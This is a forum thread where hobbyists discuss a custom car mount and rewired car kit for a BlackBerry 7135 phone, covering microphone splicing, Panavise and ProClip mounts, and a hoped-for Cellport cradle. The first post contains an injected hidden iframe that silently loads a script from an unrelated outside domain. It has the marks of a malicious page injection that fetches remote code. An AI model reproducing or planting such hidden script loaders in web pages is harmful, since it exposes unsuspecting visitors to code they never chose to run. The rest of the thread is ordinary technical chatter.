+ Reply to Thread

Pics of 7135 Car Mount/Customization

Thought some of you might like to see this. This is how I mounted my 7135 car kit. I had the kit taken apart and fabricated into a "real" car kit. I also spliced the 6035 kit's microphone into the 7135 kit. It is clipped to the visor.

This first picture is of the holster scewed to the mount. I broke the belt clip off the back, drilled a hole into it, and then screwed it to the mount. The screw is covered with electrical tape to avoid scratching the phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Thumbnails Attached Thumbnails Pics of 7135 Car Mount/Customization-mount.jpg  

This second picture is with the phone in it. You can even see the screen protectors if you pay attention! (Also, sorry about the glare)
    Attached Thumbnails Attached Thumbnails Pics of 7135 Car Mount/Customization-withfone.jpg  

This third picture is of the customization of the speaker and kit. This is mounted underneath the center arm rest and behind the e-brake.
    Attached Thumbnails Attached Thumbnails Pics of 7135 Car Mount/Customization-custom.jpg  

Good Stuff. Which Audi do you have?

Did you try to integrate into the Factory system? I have a TT and would love to use the phone system through the stereo and dash mic.

I have an A4. I didn't try to integrate, just because I didn't want to put the time/money into a car I am only going to have for another year or so. I know the instructions on how to do it are available all over the internet. Check audiworld.com if you can't find it elsewhere. I am pretty sure I have seen it there.

Very nice job. So did you get both the 7135 and 6035 car kits and combine the two, or just the 6035 car kit? How does it work in real life operation with ambient noise and such?

IMHO, the best kit ever was the kit for the Nokis 61xx, 51xx series phones (AT&T/T-Mobile). That being said, this kit sounds very good for the person on the other end, and ok for me. I can hear and be heard on the highway with no problems.

I had the 6035 kit before (for use with my 6035), and then bought the 7135 kit and used the mic from the 6035 (which required splicing). The 6035 kit WILL NOT work with the 7135.

Awesome job J.

I really would love to have something better than the holster as my holder, but I think it will do until something better comes along.

Is that a Panavise In-Dash? I am going to order one for my Lincoln Aviator this week. They also have something new that might help the angle a little. It's called the 'tipper'. It allows you to change the angle 30 degrees.

I have attached a jpg of the tipper to this post (it's a little big, sorry, and you need to scroll to the bottom of the page).

I too want to modify the car kit to be more of a permanent thing. How much did it cost you?

Thanks for the input and the pix. I know we are all busy these days!

Jeff
    Attached Thumbnails Attached Thumbnails Pics of 7135 Car Mount/Customization-tipper.jpg  
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Here's the kit I'm waiting for. I purchased a ProClip for my Treo in my Yukon. Very easy to install, very secure and adjustable for viewing. I emailed them today about availablity of a 7135 cradle. I'll let you know what I hear back.

[URL=www.proclipusa.com]

Pretty quick response. They said about 4 weeks before they'll have it available.

Jeff-

The modification was relatively simple believe it or not. I paid to have it done (~$150), but knowing what I know now, I would not have. Just take the kit apart, wire it to a 12v power source, and bury it somewhere. Pretty straight forward.

The mount is a Panavise rip-off in dash mount. Works like a charm. I just drilled a hole in the middle of the mount, and screwed the holster in there. No problems. Re the lean angle, I actually bent the mount, and it looks fine. The picture makes it look bad as I took it from over the top, but when sitting properly, it works perfectly!

On another note, I received an email reply from a guy at Cellport who said that he personally was working on a cradle for the 7135 because the company wasn't going to make one. He said he would contact me with more information when available.

Originally posted by jpalay
    I had the 6035 kit before (for use with my 6035), and then bought the 7135 kit and used the mic from the 6035 (which required splicing). The 6035 kit WILL NOT work with the 7135.
    So what are the difference(s) between the two mikes that prompted you to splice in the 6035's mike to the 7135 kit? Is the mike in the 7135 kit not worthwhile?

The 7135 mic is a little nub mic (no wire to it). I really wanted the mic closer to my mouth.

On another note, I received an email reply from a guy at Cellport who said that he personally was working on a cradle for the 7135 because the company wasn't going to make one. He said he would contact me with more information when available.
    He was working on it personally because CELLPORT wasnt going to make one? WOW. How many will he make???
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Don't know how many he will make, but it sounded like he would make however many he could sell. I wrote him back and he didn't reply. Perhaps I will send him another note...

Jeff-

This would be great. Is he planning on making a cradle to work with the cellport system? If so, I would definitely be interested in getting one of these.

I just wonder what kind of support would be available if cellport doesn't want to make one of these themselves.

Jim